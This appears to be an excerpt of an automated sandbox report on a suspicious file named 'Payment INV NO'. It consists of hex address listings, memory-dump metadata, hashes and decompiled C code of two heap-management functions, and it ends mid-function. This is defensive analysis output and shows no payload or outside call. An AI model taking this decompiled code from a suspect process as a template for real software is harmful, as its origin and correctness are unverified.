                                                          0x017fe36a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe36a
                                                          0x017fe332
                                                          0x017b46a4
                                                          0x017b46a7
                                                          0x017b46ae
                                                          0x017b46b1
                                                          0x017b46b8
                                                          0x017b46c5
                                                          0x017fe3ce
                                                          0x017fe47d
                                                          0x017fe47d
                                                          0x017b47f6
                                                          0x017b4808
                                                          0x017b4812
                                                          0x017b4817
                                                          0x017b481a
                                                          0x017b481d
                                                          0x017b4820
                                                          0x017b4823
                                                          0x017b4764
                                                          0x017b476a
                                                          0x017b476f
                                                          0x017fe4a6
                                                          0x017fe4a9
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe4b8
                                                          0x017b477a
                                                          0x017b477d
                                                          0x017fe4c2
                                                          0x017fe4c8
                                                          0x017fe4cf
                                                          0x017fe4d2
                                                          0x017fe4d9
                                                          0x017fe4dc
                                                          0x017fe4de
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe4e4
                                                          0x017fe4ea
                                                          0x017fe4ed
                                                          0x017fe4f1
                                                          0x017fe4f4
                                                          0x017fe4f6
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe4fc
                                                          0x017fe500
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe506
                                                          0x017fe509
                                                          0x017fe50b
                                                          0x017fe579
                                                          0x017fe581
                                                          0x017fe586
                                                          0x00000000
                                                          0x017fe586
                                                          0x017fe50d
                                                          0x017fe510
                                                          0x017fe513
                                                          0x017fe516
                                                          0x017fe519
                                                          0x017fe51c
                                                          0x017fe51f
                                                          0x017fe52f
                                                          0x017fe52f
                                                          0x017fe531
                                                          0x017fe534
                                                          0x017fe537
                                                          0x017fe521
                                                          0x017fe521
                                                          0x017fe521
                                                          0x017fe53a
                                                          0x017fe53d
                                                          0x017fe541
                                                          0x017fe544
                                                          0x00000000
                                                          0x017fe546
                                                          0x017fe546
                                                          0x017fe54a
                                                          0x017fe553
                                                          0x017fe553
                                                          0x017fe555
                                                          0x017fe555
                                                          0x017fe56b
                                                          0x017fe56d
                                                          0x017fe570
                                                          0x00000000
                                                          0x017fe576
                                                          0x017fe576
                                                          0x00000000
                                                          0x017fe576
                                                          0x017fe570
                                                          0x017fe544
                                                          0x017b4783
                                                          0x017b4783
                                                          0x017b478a
                                                          0x017fe58e
                                                          0x017fe590
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe596
                                                          0x017fe59c
                                                          0x017fe5a0
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe5a6
                                                          0x017fe5b2
                                                          0x017fe5b7
                                                          0x017fe5b9
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe5bf
                                                          0x017fe5c2
                                                          0x017fe5c4
                                                          0x017fe5ca
                                                          0x017fe5d0
                                                          0x017fe5da
                                                          0x017fe5da
                                                          0x017fe5d0
                                                          0x00000000
                                                          0x017fe5c4
                                                          0x00000000
                                                          0x017b478a
                                                          0x017b4775
                                                          0x017b4775
                                                          0x00000000
                                                          0x017b4775
                                                          0x017fe489
                                                          0x017fe48c
                                                          0x017fe48e
                                                          0x017fe490
                                                          0x017fe490
                                                          0x017fe492
                                                          0x017fe494
                                                          0x017b4761
                                                          0x017b4761
                                                          0x00000000
                                                          0x017b4761
                                                          0x017b46cb
                                                          0x017b46ce
                                                          0x017b46d3
                                                          0x017fe3da
                                                          0x017fe3e0
                                                          0x017fe3e3
                                                          0x017fe3e8
                                                          0x017fe3eb
                                                          0x017fe3ed
                                                          0x017fe424
                                                          0x00000000
                                                          0x017fe424
                                                          0x017fe3ef
                                                          0x017fe3fc
                                                          0x017fe401
                                                          0x017fe403
                                                          0x00000000
                                                          0x00000000
                                                          0x017fe40b
                                                          0x017fe411
                                                          0x017fe414
                                                          0x017fe416
                                                          0x017fe419
                                                          0x017fe41c
                                                          0x017fe41c
                                                          0x017b46d9
                                                          0x017b46db
                                                          0x017b4862
                                                          0x017b46e1
                                                          0x017b46e1
                                                          0x017b46e1
                                                          0x017b46e6
                                                          0x017b46e9
                                                          0x017b46ec
                                                          0x017b46ef
                                                          0x017b46f8
                                                          0x017b4852
                                                          0x017b4852
                                                          0x00000000
                                                          0x017b46fe
                                                          0x017b46fe
                                                          0x017b4704
                                                          0x017b47a3
                                                          0x017b47a3
                                                          0x017b47a9
                                                          0x017b47ac
                                                          0x017b47af
                                                          0x017b4830
                                                          0x017b4830
                                                          0x017b4832
                                                          0x017b4834
                                                          0x017b4837
                                                          0x017b483a
                                                          0x017b485c
                                                          0x017b485d
                                                          0x017b485d
                                                          0x017b483c
                                                          0x017b483f
                                                          0x017b4842
                                                          0x017b4845
                                                          0x00000000
                                                          0x017b484b
                                                          0x00000000
                                                          0x017b484b
                                                          0x017b4845
                                                          0x017b4830
                                                          0x017b47b1
                                                          0x017b47b4
                                                          0x017b47b5
                                                          0x017b47b8
                                                          0x017b47ba
                                                          0x017b47bd
                                                          0x017b484d
                                                          0x017b4850
                                                          0x017b486c
                                                          0x017b486f
                                                          0x00000000
                                                          0x00000000
                                                          0x017b4875
                                                          0x00000000
                                                          0x017b4850
                                                          0x017b47c3
                                                          0x017b47c3
                                                          0x017b47c6
                                                          0x017b47ca
                                                          0x017fe438
                                                          0x017fe438
                                                          0x017b47d3
                                                          0x017b47d6
                                                          0x017b47e1
                                                          0x017b47e9
                                                          0x017b47eb
                                                          0x017b47ee
                                                          0x017b47f0
                                                          0x017b4757
                                                          0x017b475b
                                                          0x017fe44e
                                                          0x017fe457
                                                          0x017fe45c
                                                          0x017fe465
                                                          0x017fe468
                                                          0x017fe46d
                                                          0x017fe46f
                                                          0x017fe49e
                                                          0x00000000
                                                          0x017fe49e
                                                          0x017fe478
                                                          0x00000000
                                                          0x017fe478
                                                          0x00000000
                                                          0x017b475b
                                                          0x00000000
                                                          0x017b47f0
                                                          0x017b4715
                                                          0x017b4721
                                                          0x017b4723
                                                          0x017b4728
                                                          0x017b47a0
                                                          0x017b47a0
                                                          0x00000000
                                                          0x017b47a0
                                                          0x017b4733
                                                          0x017b473f
                                                          0x017b4745
                                                          0x017b474a
                                                          0x017b474c
                                                          0x017b4751
                                                          0x017fe430
                                                          0x00000000
                                                          0x017fe430
                                                          0x00000000
                                                          0x017b4751

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0faab5bde1146c093f08aa7a2caec9db2e156d70d96066825add4ffbe2f9a9c3
                                                          • Instruction ID: 61d68d6e4cfb415fce598e0597f09c287a7ae774536acd5fa7aa72db634baaef
                                                          • Opcode Fuzzy Hash: 0faab5bde1146c093f08aa7a2caec9db2e156d70d96066825add4ffbe2f9a9c3
                                                          • Instruction Fuzzy Hash: 31E1AC71A042499FDB25CF58C884BAEFBF2FF85304F1980ADD506AB356DB34AA41CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BB236 Relevance: .3, Instructions: 305COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			E017BB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E017BB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = L0183CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E017C0678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E017D9660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E017D9660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E017D9660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E017C174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E017C138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E017B7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										L0185138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E017B7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										L01851582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E017B7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E017B7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									L01851582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E017B7D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									L0184FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										L0184FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E017B99BF(__ecx, _t87,  &_v16, 0);
					E017BA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							L0184FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}






































                                                          0x017bb23f
                                                          0x017bb246
                                                          0x017bb249
                                                          0x017bb24b
                                                          0x017bb251
                                                          0x017bb258
                                                          0x017bb262
                                                          0x017bb2b2
                                                          0x017bb2b6
                                                          0x017bb456
                                                          0x017bb456
                                                          0x017bb45a
                                                          0x01802912
                                                          0x01802914
                                                          0x01802916
                                                          0x00000000
                                                          0x00000000
                                                          0x0180291f
                                                          0x01802921
                                                          0x00000000
                                                          0x00000000
                                                          0x01802927
                                                          0x00000000
                                                          0x01802927
                                                          0x017bb460
                                                          0x017bb460
                                                          0x017bb462
                                                          0x017bb464
                                                          0x0180292e
                                                          0x01802931
                                                          0x0180293f
                                                          0x01802945
                                                          0x01802945
                                                          0x01802931
                                                          0x00000000
                                                          0x017bb464
                                                          0x017bb2bc
                                                          0x017bb2bf
                                                          0x017bb2c5
                                                          0x017bb2c8
                                                          0x017bb2ca
                                                          0x018027af
                                                          0x018027af
                                                          0x017bb2d0
                                                          0x017bb2d7
                                                          0x017bb437
                                                          0x017bb2dd
                                                          0x017bb2dd
                                                          0x017bb2dd
                                                          0x017bb2e3
                                                          0x017bb2e5
                                                          0x017bb43e
                                                          0x017bb443
                                                          0x018027b6
                                                          0x018027b6
                                                          0x017bb443
                                                          0x017bb2f5
                                                          0x017bb2fa
                                                          0x017bb2fd
                                                          0x017bb2ff
                                                          0x017bb46f
                                                          0x017bb46f
                                                          0x017bb30a
                                                          0x017bb30f
                                                          0x017bb310
                                                          0x017bb315
                                                          0x017bb31b
                                                          0x017bb31c
                                                          0x017bb321
                                                          0x017bb322
                                                          0x017bb329
                                                          0x017bb32b
                                                          0x017bb32d
                                                          0x018027c2
                                                          0x018027c2
                                                          0x018027c5
                                                          0x018027c7
                                                          0x00000000
                                                          0x00000000
                                                          0x018027c9
                                                          0x018027cb
                                                          0x018027ce
                                                          0x018027d0
                                                          0x018027d2
                                                          0x018027d2
                                                          0x018027d5
                                                          0x018027db
                                                          0x018027e0
                                                          0x018027e1
                                                          0x018027e6
                                                          0x018027e7
                                                          0x018027ee
                                                          0x018027f0
                                                          0x018027f2
                                                          0x00000000
                                                          0x018027f4
                                                          0x018027f4
                                                          0x00000000
                                                          0x018027f4
                                                          0x018027f2
                                                          0x018027f7
                                                          0x018027f9
                                                          0x00000000
                                                          0x00000000
                                                          0x018027ff
                                                          0x00000000
                                                          0x017bb333
                                                          0x017bb333
                                                          0x017bb336
                                                          0x017bb336
                                                          0x017bb33c
                                                          0x017bb341
                                                          0x017bb344
                                                          0x017bb44e
                                                          0x017bb44e
                                                          0x017bb34a
                                                          0x017bb34d
                                                          0x017bb353
                                                          0x017bb358
                                                          0x017bb359
                                                          0x017bb35e
                                                          0x017bb35f
                                                          0x017bb366
                                                          0x017bb368
                                                          0x017bb36a
                                                          0x018028f2
                                                          0x018028fe
                                                          0x01802903
                                                          0x01802903
                                                          0x00000000
                                                          0x017bb370
                                                          0x017bb38c
                                                          0x017bb391
                                                          0x017bb393
                                                          0x0180280a
                                                          0x0180280a
                                                          0x017bb399
                                                          0x017bb39b
                                                          0x00000000
                                                          0x017bb3a1
                                                          0x017bb3a1
                                                          0x017bb3a6
                                                          0x017bb3b0
                                                          0x017bb3b2
                                                          0x0180281d
                                                          0x017bb3b8
                                                          0x017bb3b8
                                                          0x017bb3b8
                                                          0x017bb3ba
                                                          0x017bb3bd
                                                          0x01802824
                                                          0x0180282a
                                                          0x01802831
                                                          0x01802841
                                                          0x0180284b
                                                          0x0180284d
                                                          0x01802858
                                                          0x01802858
                                                          0x01802858
                                                          0x01802870
                                                          0x01802870
                                                          0x01802831
                                                          0x017bb3c3
                                                          0x017bb3c8
                                                          0x017bb3d2
                                                          0x017bb3d4
                                                          0x01802883
                                                          0x017bb3da
                                                          0x017bb3da
                                                          0x017bb3da
                                                          0x017bb3dc
                                                          0x017bb3df
                                                          0x0180288f
                                                          0x01802891
                                                          0x0180289c
                                                          0x0180289c
                                                          0x0180289c
                                                          0x018028b4
                                                          0x018028b4
                                                          0x017bb3e5
                                                          0x017bb3ea
                                                          0x017bb3ec
                                                          0x018028c7
                                                          0x017bb3f2
                                                          0x017bb3f2
                                                          0x017bb3f2
                                                          0x017bb3f7
                                                          0x017bb3fa
                                                          0x018028d9
                                                          0x018028d9
                                                          0x017bb400
                                                          0x017bb407
                                                          0x017bb40a
                                                          0x017bb40f
                                                          0x017bb413
                                                          0x017bb41f
                                                          0x017bb424
                                                          0x017bb426
                                                          0x018028e3
                                                          0x018028e8
                                                          0x018028e8
                                                          0x017bb426
                                                          0x017bb42f
                                                          0x00000000
                                                          0x017bb42f
                                                          0x017bb39b
                                                          0x017bb36a
                                                          0x017bb264
                                                          0x017bb264
                                                          0x017bb279
                                                          0x017bb27f
                                                          0x017bb287
                                                          0x017bb28c
                                                          0x017bb290
                                                          0x017bb29c
                                                          0x017bb2a3
                                                          0x018027a0
                                                          0x018027a5
                                                          0x018027a5
                                                          0x017bb2a3
                                                          0x017bb2a9
                                                          0x017bb2b1
                                                          0x017bb2b1

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9762a30093da593469db8c4199bb77c489efc3680c19d7e4d8089bf76c7cd6b
                                                          • Instruction ID: 02c98fa72fccf3d5a78283e0abd013b8b53cda8b74941248124f11a79fc66004
                                                          • Opcode Fuzzy Hash: b9762a30093da593469db8c4199bb77c489efc3680c19d7e4d8089bf76c7cd6b
                                                          • Instruction Fuzzy Hash: F1B1B031A0460A9FDB16CBA9C8D4BBEBBB6EF84304F1401A9EA42D7385D770DA40CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A849B Relevance: .3, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E017A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x186f9c0);
				E017ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1887b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E017ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E017B2280( *[fs:0x30], 0x1888550);
						_t139 =  *0x1887b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E017CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E017AFFB0(_t193, _t235, 0x1888550);
								L5:
								return E017ED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01791C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1887b9c; // 0x0
							_t235 = E017B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
